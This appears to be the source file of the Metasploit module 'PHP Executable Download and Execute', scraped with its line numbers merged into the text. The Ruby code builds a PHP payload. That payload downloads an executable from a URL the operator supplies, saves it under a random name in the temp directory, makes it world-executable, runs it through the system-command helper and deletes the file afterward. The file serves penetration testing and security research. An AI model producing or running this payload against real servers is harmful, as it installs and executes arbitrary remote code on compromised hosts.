Path: blob/master/modules/payloads/singles/php/download_exec.rb
19851 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45module MetasploitModule6CachedSize = :dynamic78include Msf::Payload::Php9include Msf::Payload::Single1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'PHP Executable Download and Execute',16'Description' => 'Download an EXE from an HTTP URL and execute it',17'Author' => [ 'egypt' ],18'License' => BSD_LICENSE,19'Platform' => 'php',20'Arch' => ARCH_PHP,21'Privileged' => false22)23)2425# EXITFUNC is not supported :/26deregister_options('EXITFUNC')2728# Register command execution options29register_options(30[31OptString.new('URL', [ true, 'The pre-encoded URL to the executable' ])32]33)34end3536def php_exec_file37exename = Rex::Text.rand_text_alpha(4..11)38dis = '$' + Rex::Text.rand_text_alpha(4..7)39shell = <<-END_OF_PHP_CODE40#{php_preamble(disabled_varname: dis)}41if (!function_exists('sys_get_temp_dir')) {42function sys_get_temp_dir() {43if (!empty($_ENV['TMP'])) { return realpath($_ENV['TMP']); }44if (!empty($_ENV['TMPDIR'])) { return realpath($_ENV['TMPDIR']); }45if (!empty($_ENV['TEMP'])) { return realpath($_ENV['TEMP']); }46$tempfile=tempnam(uniqid(rand(),TRUE),'');47if (file_exists($tempfile)) {48@unlink($tempfile);49return realpath(dirname($tempfile));50}51return null;52}53}54$fname = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "#{exename}.exe";55$fd_in = fopen("#{datastore['URL']}", "rb");56if ($fd_in === false) { die(); }57$fd_out = fopen($fname, "wb");58if ($fd_out === false) { die(); }59while (!feof($fd_in)) {60fwrite($fd_out, fread($fd_in, 8192));61}62fclose($fd_in);63fclose($fd_out);64chmod($fname, 0777);65$c = $fname;66#{php_system_block(cmd_varname: '$c', disabled_varnam: dis)}67@unlink($fname);68END_OF_PHP_CODE6970# return Rex::Text.compress(shell)71return shell72end7374#75# Constructs the payload76#77def generate(_opts = {})78return php_exec_file79end80end818283